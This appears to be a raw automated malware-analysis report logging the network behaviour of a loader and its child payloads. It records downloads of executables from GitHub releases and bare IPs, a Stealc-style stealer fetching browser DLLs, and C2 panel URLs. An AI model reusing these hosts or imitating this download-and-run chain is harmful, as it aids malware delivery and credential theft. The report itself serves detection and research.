                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A7DFD0 recv,recv,recv,recv,0_2_00A7DFD0
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/gold/releases/download/ggggg/gold1111111111.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/910997785/34bbe59b-8804-485f-bec3-be8f21681382?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085015Z&X-Amz-Expires=300&X-Amz-Signature=95284105c340b388ec84ffb84562274149d126ddb76b6dfe4032a6b569caa23b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgold1111111111.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/zakaz2/releases/download/zakaz2/liddad.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/910998942/245e975e-0c8d-48e8-a6d9-d07e7e1e6c8a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085020Z&X-Amz-Expires=300&X-Amz-Signature=529769effe37e35e131f5039b89fb420ef6d2600ba248f0f6cc794883bc50b20&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dliddad.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/911427352/1d7d7595-2252-461b-958f-e8d3372f48f6?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085029Z&X-Amz-Expires=300&X-Amz-Signature=af07bd313c5d406f418a7c1daa9345e61385b33bd2c090d2cc1c6805f8d1a897&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dclient_jackbastadguy.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                                  Source: global trafficHTTP traffic detected: GET /inc/legs.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /test/am209.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /inc/stealc_valenciga.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 135.181.65.216Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/gold123.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/sqlite3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/freebl3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/mozglue.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/msvcp140.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/nss3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/softokn3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/vcruntime140.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
                                  Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                                  Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                                  Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
                                  Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                                  Source: global trafficDNS traffic detected: DNS query: github.com
                                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                                  Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                                  Source: global trafficDNS traffic detected: DNS query: apis.google.com
                                  Source: global trafficDNS traffic detected: DNS query: rabidcowse.shop
                                  Source: global trafficDNS traffic detected: DNS query: play.google.com
                                  Source: global trafficDNS traffic detected: DNS query: httpbin.org
                                  Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
                                  Source: global trafficDNS traffic detected: DNS query: sexo.gofile.fun
                                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Fri, 03 Jan 2025 08:50:34 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Fri, 03 Jan 2025 08:50:36 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Fri, 03 Jan 2025 08:51:13 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Fri, 03 Jan 2025 08:51:15 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://.css
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://.jpg
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: http://135.181.65.216
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/freebl3.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/freebl3.dllKJL
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/freebl3.dllkK
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/mozglue.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/msvcp140.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/msvcp140.dllgJ
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/nss3.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/nss3.dll0A
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/nss3.dllg
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/nss3.dlll4
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/nss3.dllqA;
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/softokn3.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/sqlite3.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/sqlite3.dllK
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/sqlite3.dllt-
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/vcruntime140.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/4a21a126be249f0d/vcruntime140.dll26be249f0d/nss3.dll
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.php
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.php1
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.php:
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.php;A
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpJ
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpK
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpR
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpal
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpf
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpf2
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpl
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpoA
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phprs
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpser
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpwA
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: http://135.181.65.216/ee45b7c5e4cb75cb.phpx
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.65.216b
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: http://135.181.65.216ee45b7c5e4cb75cb.phpfox
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/6165
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0750001
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9d~
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedl
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/a
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/gold123.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/legs.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/legs.exeB
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/stealc_valenciga.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/stealc_valenciga.exex
